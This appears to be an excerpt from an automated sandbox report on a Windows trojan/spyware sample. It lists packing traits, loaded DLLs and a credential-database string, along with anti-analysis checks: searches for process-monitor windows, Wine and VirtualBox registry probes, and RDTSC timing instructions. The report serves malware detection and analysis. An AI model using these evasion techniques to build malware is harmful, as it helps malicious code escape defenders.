              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCD8640_2_00BCD864
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B240400_2_00B24040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B268400_2_00B26840
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5C0400_2_00B5C040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B261A00_2_00B261A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B541D00_2_00B541D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2E9700_2_00B2E970
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B24AC00_2_00B24AC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B25AC90_2_00B25AC9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B292100_2_00B29210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2B2100_2_00B2B210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE6A1F0_2_00CE6A1F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0BD00_2_00CF0BD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B22B800_2_00B22B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3DB300_2_00B3DB30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3FB600_2_00B3FB60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B48CB00_2_00B48CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B25C900_2_00B25C90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE34ED0_2_00CE34ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B524E00_2_00B524E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B294D00_2_00B294D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B26CC00_2_00B26CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB04B10_2_00CB04B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2542C0_2_00B2542C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE847D0_2_00CE847D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B235800_2_00B23580
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEADF20_2_00BEADF2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2AD000_2_00B2AD00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C996CD0_2_00C996CD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B45E900_2_00B45E90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B47E200_2_00B47E20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CED6690_2_00CED669
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B406500_2_00B40650
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B587B00_2_00B587B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5C7800_2_00B5C780
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C92F9E0_2_00C92F9E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B277D00_2_00B277D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B227D00_2_00B227D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B60F600_2_00B60F60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB771D0_2_00CB771D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE4F3D0_2_00CE4F3D
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992955942622951
              Source: file.exeStatic PE information: Section: hvjfzrca ZLIB complexity 0.9943516941977725
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B527B0 CoCreateInstance,0_2_00B527B0
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2204372131.0000000005AE8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204569000.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227126080.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 1872384 > 1048576
              Source: file.exeStatic PE information: Raw size of hvjfzrca is bigger than: 0x100000 < 0x19f400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hvjfzrca:EW;thpuhcpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hvjfzrca:EW;thpuhcpo:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cb629 should be: 0x1d57fa
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: hvjfzrca
              Source: file.exeStatic PE information: section name: thpuhcpo
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0120CC10 push esi; iretd 0_3_0120CC11
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0120CC10 push esi; iretd 0_3_0120CC11
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA1B push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA1B push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA1B push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA1B push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA1B push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA0E push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA0E push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA0E push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA0E push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EFA0E push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EB28A push edx; iretd 0_3_011EB2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EB28A push edx; iretd 0_3_011EB2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EB28A push edx; iretd 0_3_011EB2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EB28A push edx; iretd 0_3_011EB2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EB28A push edx; iretd 0_3_011EB2FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F16D7 pushfd ; ret 0_3_011F16E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F16D7 pushfd ; ret 0_3_011F16E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F16D7 pushfd ; ret 0_3_011F16E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F16D7 pushfd ; ret 0_3_011F16E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F16D7 pushfd ; ret 0_3_011F16E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F1CC7 pushfd ; ret 0_3_011F1CD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F1CC7 pushfd ; ret 0_3_011F1CD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F1CC7 pushfd ; ret 0_3_011F1CD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F1CC7 pushfd ; ret 0_3_011F1CD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011F1CC7 pushfd ; ret 0_3_011F1CD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EF9E6 push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EF9E6 push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EF9E6 push esi; ret 0_3_011EFA6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011EF9E6 push esi; ret 0_3_011EFA6A
              Source: file.exeStatic PE information: section name: entropy: 7.983036802389504
              Source: file.exeStatic PE information: section name: hvjfzrca entropy: 7.95343629195046

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AFC second address: CF4B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4B04 second address: CF4B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FAC2C5039A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C75 second address: CF4C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0DCh 0x00000009 jmp 00007FAC2CCCA0E2h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C97 second address: CF4C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4DAC second address: CF4DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2CCCA0E3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4DC6 second address: CF4DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5431 second address: CF5438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5438 second address: CF544F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAC2C5039A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FAC2C5039A8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8585 second address: CF85B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f movzx ecx, cx 0x00000012 cld 0x00000013 push 00000000h 0x00000015 stc 0x00000016 push A6E02978h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF85B9 second address: CF85BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF85BD second address: CF85C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF85C1 second address: CF85C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF85C7 second address: CF85E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0E5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF86C4 second address: CF871D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FAC2C5039A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jo 00007FAC2C5039BCh 0x0000001a jo 00007FAC2C5039B6h 0x00000020 jmp 00007FAC2C5039B0h 0x00000025 nop 0x00000026 xor edi, dword ptr [ebp+122D2C6Ch] 0x0000002c push 00000000h 0x0000002e sbb di, 685Dh 0x00000033 call 00007FAC2C5039A9h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FAC2C5039B0h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF871D second address: CF8727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAC2CCCA0D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8727 second address: CF8757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e jp 00007FAC2C5039A6h 0x00000014 pop eax 0x00000015 pop edi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FAC2C5039A6h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8757 second address: CF875B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF875B second address: CF8769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8769 second address: CF876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF876D second address: CF878C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAC2C5039AFh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF878C second address: CF8790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8790 second address: CF87F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FAC2C5039A8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov di, dx 0x00000025 jmp 00007FAC2C5039B7h 0x0000002a push 00000003h 0x0000002c mov di, 6113h 0x00000030 push 00000000h 0x00000032 push 00000003h 0x00000034 mov edx, 3B362342h 0x00000039 push 9B7A230Fh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAC2C5039ACh 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF87F5 second address: CF884F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAC2CCCA0E2h 0x0000000b popad 0x0000000c add dword ptr [esp], 2485DCF1h 0x00000013 sub dword ptr [ebp+122D358Ah], ebx 0x00000019 jmp 00007FAC2CCCA0E0h 0x0000001e lea ebx, dword ptr [ebp+1244F467h] 0x00000024 mov dword ptr [ebp+122D1E73h], eax 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FAC2CCCA0E5h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8974 second address: CF8978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8978 second address: CF897E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF897E second address: CF8984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8984 second address: CF8A0E instructions: 0x00000000 rdtsc 0x00000002 je 00007FAC2CCCA0D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f jmp 00007FAC2CCCA0DEh 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push ebx 0x0000001a jmp 00007FAC2CCCA0E5h 0x0000001f pop ebx 0x00000020 pop eax 0x00000021 mov dword ptr [ebp+122D1D99h], ebx 0x00000027 lea ebx, dword ptr [ebp+1244F472h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FAC2CCCA0D8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push edi 0x00000049 jmp 00007FAC2CCCA0E1h 0x0000004e pop edi 0x0000004f push eax 0x00000050 pushad 0x00000051 pushad 0x00000052 jmp 00007FAC2CCCA0DCh 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC17 second address: CEEC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC1B second address: CEEC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC21 second address: CEEC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAC2C5039B8h 0x0000000b pop edi 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F11 second address: D17F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F17 second address: D17F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18052 second address: D18060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAC2CCCA0D6h 0x0000000a pop esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18060 second address: D18066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18066 second address: D18073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007FAC2CCCA0DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18409 second address: D1840F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1840F second address: D1841D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAC2CCCA0D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1841D second address: D18423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18423 second address: D1843B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D185B3 second address: D185C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAC2C5039ACh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D189D4 second address: D189D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D189D8 second address: D189F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007FAC2C5039AEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FAC2C5039A6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D189F7 second address: D189FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18CD5 second address: D18CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
